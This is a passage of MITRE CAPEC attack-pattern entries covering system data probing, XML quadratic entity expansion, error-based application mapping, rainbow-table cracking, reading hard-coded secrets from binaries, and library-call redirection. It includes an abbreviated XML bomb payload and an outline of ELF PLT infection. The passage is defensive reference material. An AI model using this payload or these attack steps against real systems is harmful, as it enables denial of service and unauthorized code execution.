[REF-703] Ujjwal Guin, Ke Huang, Daniel DiMase, John M. Carulli, Jr., Mohammad Tehranipoor and Yiorgos Makris. "Counterfeit Integrated Circuits: A Rising Threat in the Global Semiconductor Supply Chain". Proceedings of the IEEE. IEEE. 2014. <https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6856206>. URL validated: 2022-02-15.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Mitigations, References
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Counterfeit Component Supplied

CAPEC-545: Pull Data from System Resources

Attack Pattern ID: 545

Abstraction: Standard

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	116	Excavation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	498	Probe iOS Screenshots
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	546	Incomplete Data Deletion in a Multi-Tenant Environment
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	634	Probe Audio and Video Peripherals
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	639	Probe System Files
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	561	Windows Admin Shares with Stolen Credentials
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	643	Identify Shared Files/Directories on System
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	644	Use of Captured Hashes (Pass The Hash)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Collect and Analyze Information

Related Weaknesses

CWE-ID	Weakness Name
1239	Improper Zeroization of Hardware Register
1243	Sensitive Non-Volatile Information Not Protected During Debug
1258	Exposure of Sensitive System Information Due to Uncleared Debug Information
1266	Improper Scrubbing of Sensitive Data from Decommissioned Device
1272	Sensitive Information Uncleared Before Debug/Power State Transition
1278	Missing Protection Against Hardware Reverse Engineering Using Integrated Circuit (IC) Imaging Techniques
1323	Improper Management of Sensitive Trace Data
1258	Exposure of Sensitive System Information Due to Uncleared Debug Information
1330	Remanent Data Readable after Memory Erase

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1005	Data from Local System
1555.001	Credentials from Password Stores:Keychain

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Description Summary, References
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Description Summary
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Probe Application Queries

CAPEC-491: Quadratic Data Expansion

Attack Pattern ID: 491

Abstraction: Detailed

View customized information:

Description

Alternate Terms

Term: XML Entity Expansion (XEE)

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	230	Serialized Data with Nested Payloads
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	228	DTD Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Survey the target: An adversary determines the input data stream that is being processed by a data parser that supports using substituion on the victim's side.
Techniques
Use an automated tool to record all instances of URLs to process requests.
Use a browser to manually explore the website and analyze how the application processes requests.

Exploit

Craft malicious payload: The adversary crafts malicious message containing nested quadratic expansion that completely uses up available server resource.
Send the message: Send the malicious crafted message to the target URL.

Prerequisites

This type of attack requires a server that accepts serialization data which supports substitution and parses the data.

Consequences

Scope	Impact	Likelihood
Availability	Unreliable Execution Resource Consumption

Mitigations

Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion.

Example Instances

In this example the attacker defines one large entity and refers to it many times.

<?xml version="1.0"?>
<!DOCTYPE bomb [<!ENTITY x "AAAAA ... [100K of them] ... AAAA">]>
<b><c>&x;&x; ... [100K of them]... &x;&x;</c></b>

This results in a relatively small message of 100KBs that will expand to a message in the GB range.

Related Weaknesses

CWE-ID	Weakness Name
770	Allocation of Resources Without Limits or Throttling

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Related_Attack_Patterns
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations, Related_Attack_Patterns
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated @Name, Alternate_Terms, Consequences, Description, Example_Instances, Execution_Flow, Mitigations, Prerequisites
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances
Previous Entry Names
Change Date	Previous Entry Name
2021-10-21 (Version 3.6)	XML Quadratic Expansion

CAPEC-54: Query System for Information

Attack Pattern ID: 54

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	116	Excavation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	95	WSDL Scanning
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	127	Directory Indexing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	215	Fuzzing for application mapping
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	261	Fuzzing for garnering other adjacent user/sensitive data
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	462	Cross-Domain Search Timing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Determine parameters: Determine all user-controllable parameters of the application either by probing or by finding documentation

Experiment

Cause error condition: Inject each parameter with content that causes an error condition to manifest
Modify parameters: Modify the content of each parameter according to observed error conditions

Exploit

Follow up attack: Once the above steps have been repeated with enough parameters, the application will be sufficiently mapped out. The adversary can then launch a desired attack (for example, Blind SQL Injection)

Prerequisites

This class of attacks does not strictly require authorized access to the application. As Attackers use this attack process to classify, map, and identify vulnerable aspects of an application, it simply requires hypotheses to be verified, interaction with the application, and time to conduct trial-and-error activities.

Skills Required

[Level: Medium]

Although fuzzing parameters is not difficult, and often possible with automated fuzzers, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design.

Resources Required

The Attacker needs the ability to probe application functionality and provide it erroneous directives or data without triggering intrusion detection schemes or making enough of an impact on application logging that steps are taken against the adversary.

The Attack does not need special hardware, software, skills, or access.

Indicators

Repeated errors generated by the same piece of code are an indication, although it requires careful monitoring of the application and its associated error logs, if any.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Application designers can construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are cataloged and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.

Application designers can wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above 'code book' suggestion.

Example Instances

Blind SQL injection is an example of this technique, applied to successful exploit. See also: CVE-2006-4705

Attacker sends bad data at various servlets in a J2EE system, records returned exception stack traces, and maps application functionality.

In addition, this technique allows attackers to correlate those servlets used with the underlying open source packages (and potentially version numbers) that provide them.

Related Weaknesses

CWE-ID	Weakness Name
209	Generation of Error Message Containing Sensitive Information

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Description Summary
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow, Resources_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Probe Application Error Reporting

CAPEC-55: Rainbow Table Password Cracking

Attack Pattern ID: 55

Abstraction: Detailed

View customized information:

Description

Extended Description

A password rainbow table stores hash chains for various passwords. A password chain is computed, starting from the original password, P, via a reduce(compression) function R and a hash function H. A recurrence relation exists where Xi+1 = R(H(Xi)), X0 = P. Then the hash chain of length n for the original password P can be formed: X1, X2, X3, ... , Xn-2, Xn-1, Xn, H(Xn). P and H(Xn) are then stored together in the rainbow table. Constructing the rainbow tables takes a very long time and is computationally expensive. A separate table needs to be constructed for the various hash algorithms (e.g. SHA1, MD5, etc.). However, once a rainbow table is computed, it can be very effective in cracking the passwords that have been hashed without the use of salt.

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	49	Password Brute Forcing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	560	Use of Known Domain Credentials
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	561	Windows Admin Shares with Stolen Credentials
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	600	Credential Stuffing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	653	Use of Known Operating System Credentials

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Employ Probabilistic Techniques

Execution Flow

Explore

Determine application's/system's password policy: Determine the password policies of the target application/system.

Techniques
Determine minimum and maximum allowed password lengths.
Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).
Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).

Obtain password hashes: An attacker gets access to the database table storing hashes of passwords or potentially just discovers a hash of an individual password.

Techniques
Obtain copy of database table or flat file containing password hashes (by breaking access controls, using SQL Injection, etc.)
Obtain password hashes from platform-specific storage locations (e.g. Windows registry)
Sniff network packets containing password hashes.

Exploit

Run rainbow table-based password cracking tool: An attacker finds or writes a password cracking tool that uses a previously computed rainbow table for the right hashing algorithm. It helps if the attacker knows what hashing algorithm was used by the password system.
Techniques
Run rainbow table-based password cracking tool such as Ophcrack or RainbowCrack. Reduction function must depend on application's/system's password policy.

Prerequisites

Hash of the original password is available to the attacker. For a better chance of success, an attacker should have more than one hash of the original password, and ideally the whole table.

Salt was not used to create the hash of the original password. Otherwise the rainbow tables have to be re-computed, which is very expensive and will make the attack effectively infeasible (especially if salt was added in iterations).

The system uses one factor password based authentication.

Skills Required

[Level: Low]

A variety of password cracking tools are available that can leverage a rainbow table. The more difficult part is to obtain the password hash(es) in the first place.

Resources Required

Rainbow table of password hash chains with the right algorithm used. A password cracking tool that leverages this rainbow table will also be required. Hash(es) of the password is required.

Indicators

This is a completely offline attack that an attacker can perform at their leisure after the password hashes are obtained.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Use salt when computing password hashes. That is, concatenate the salt (random bits) with the original password prior to hashing it.

Example Instances

BusyBox 1.1.1 does not use a salt when generating passwords, which makes it easier for local users to guess passwords from a stolen password file using techniques such as rainbow tables. See also: CVE-2006-1058

Related Weaknesses

CWE-ID	Weakness Name
261	Weak Encoding for Password
521	Weak Password Requirements
262	Not Using Password Aging
263	Password Aging with Long Expiration
654	Reliance on a Single Factor in a Security Decision
916	Use of Password Hash With Insufficient Computational Effort
308	Use of Single-factor Authentication
309	Use of Password System for Primary Authentication

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1110.002	Brute Force:Password Cracking

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated @Abstraction, Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-191: Read Sensitive Constants Within an Executable

Attack Pattern ID: 191

Abstraction: Detailed

View customized information:

Description

Extended Description

One specific example of a sensitive string is a hard-coded password. Typical examples of software with hard-coded passwords include server-side executables which may check for a hard-coded password or key during a user's authentication with the server. Hard-coded passwords can also be present in client-side executables which utilize the password or key when connecting to either a remote component, such as a database server, licensing server, or otherwise, or a processes on the same host that expects a key or password. When analyzing an executable the adversary may search for the presence of such strings by analyzing the byte-code of the file itself. Example utilities for revealing strings within a file include 'strings,' 'grep,' or other variants of these programs depending upon the type of operating system used. These programs can be used to dump any ASCII or UNICODE strings contained within a program. Strings can also be searched for using a hex editors by loading the binary or object code file and utilizing native search functions such as regular expressions.

Additionally, sensitive numeric values can occur within an executable. This can be used to discover the location of cryptographic constants.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	167	White Box Reverse Engineering

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Physical Security
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

Access to a binary or executable such that it can be analyzed by various utilities.

Resources Required

Binary analysis programs such as 'strings' or 'grep', or hex editors.

Related Weaknesses

CWE-ID	Weakness Name
798	Use of Hard-coded Credentials

Notes

Other

More sophisticated methods of searching for sensitive strings within a file involve disassembly or decompiling of the file. One could, for example, utilize disassembly methods on an ISAPI executable or dll to discover a hard-coded password within the code as it executes. This type of analysis usually involves four stages in which first a debugger is attached to the running process, anti-debugging countermeasures are circumvented or bypassed, the program is analyzed step-by-step, and breakpoints are established so that discrete functions and data structures can be analyzed.

Debugging tools such as SoftICE, Ollydbg, or vendor supplied debugging tools are often used. Disassembly tools such as IDA pro, or similar tools, can also be employed. A third strategy for accessing sensitive strings within a binary involves the decompilation of the file itself into source code that reveals the strings. An example of this type of analysis involves extracting source code from a java JAR file and then using functionality within a java IDE to search the source code for sensitive, hard-coded information. In performing this analysis native java tools, such as "jar" are used to extract the compiled class files. Next, a java decompiler such as "DJ" is used to extract java source code from the compiled classes, revealing source code. Finally, the source code is audited to reveal sensitive information, a step that is usually assisted by source code analysis programs.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1552.001	Unsecured Credentials:Credentials in files

References

[REF-51] "Wikipedia". Decompiler. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/Decompiler>.

[REF-52] "Wikipedia". Debugger. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/Debugger>.

[REF-53] "Wikipedia". Disassembler. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/Disassembler>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Description Summary, Other_Notes, References, Related_Attack_Patterns, Resources_Required
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Prerequisites, Description Summary, Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated @Name, Description, Related_Attack_Patterns, Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
Previous Entry Names
Change Date	Previous Entry Name
2020-07-30 (Version 3.3)	Read Sensitive Strings Within an Executable

CAPEC-159: Redirect Access to Libraries

Attack Pattern ID: 159

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	154	Resource Location Spoofing
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	38	Leveraging/Manipulating Configuration File Search Paths
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	132	Symlink Attack
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	471	Search Order Hijacking
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	641	DLL Side-Loading
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	185	Malicious Software Download

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Identify Target: The adversary identifies the target application and determines what libraries are being used.
Techniques
Find public source code and identify library dependencies.
Gain access to the system hosting the application and look for libraries in common locations.

Experiment

Deploy Malicious Libraries: The adversary crafts malicious libraries and deploys them on the system where the application is running, or in a remote location that can be loaded by the application.

Exploit

Redirect Library Calls to Malicious Library: Once the malicious library crafted by the adversary is deployed, the adversary will manipulate the flow of the application such that it calls the malicious library. This can be done in a variety of ways based on how the application is loading and calling libraries.

Techniques
Poison the DNS cache of the system so that it loads a malicious library from a remote location hosted by the adversary instead of the legitimate location
Create a symlink that tricks the application into thinking that a malicious library is the legitimate library.
Use DLL side-loading to place a malicious verison of a DLL in the windows directory.

Prerequisites

The target must utilize external libraries and must fail to verify the integrity of these libraries before using them.

Skills Required

[Level: Low]

To modify the entries in the configuration file pointing to malicious libraries

[Level: Medium]

To force symlink and timing issues for redirecting access to libraries

[Level: High]

To reverse engineering the libraries and inject malicious code into the libraries

Consequences

Scope	Impact	Likelihood
Authorization	Execute Unauthorized Commands
Access Control Authorization	Bypass Protection Mechanism

Mitigations

Implementation: Restrict the permission to modify the entries in the configuration file.

Implementation: Check the integrity of the dynamically linked libraries before use them.

Implementation: Use obfuscation and other techniques to prevent reverse engineering the libraries.

Example Instances

In this example, the attacker using ELF infection that redirects the Procedure Linkage Table (PLT) of an executable allowing redirection to be resident outside of the infected executable. The algorithm at the entry point code is as follows... • mark the text segment writeable • save the PLT(GOT) entry • replace the PLT(GOT) entry with the address of the new lib call The algorithm in the new library call is as follows... • do the payload of the new lib call • restore the original PLT(GOT) entry • call the lib call • save the PLT(GOT) entry again (if its changed) • replace the PLT(GOT) entry with the address of the new lib call

Related Weaknesses

CWE-ID	Weakness Name
706	Use of Incorrectly-Resolved Name or Reference

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1574.008	Hijack Execution Flow:Path Interception by Search Order Hijacking

References

[REF-29] Silvio Cesare. "Share Library Call Redirection Via ELF PLT Infection". Issue 56. Phrack Magazine. 2000. <http://phrack.org/issues/56/7.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated References
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
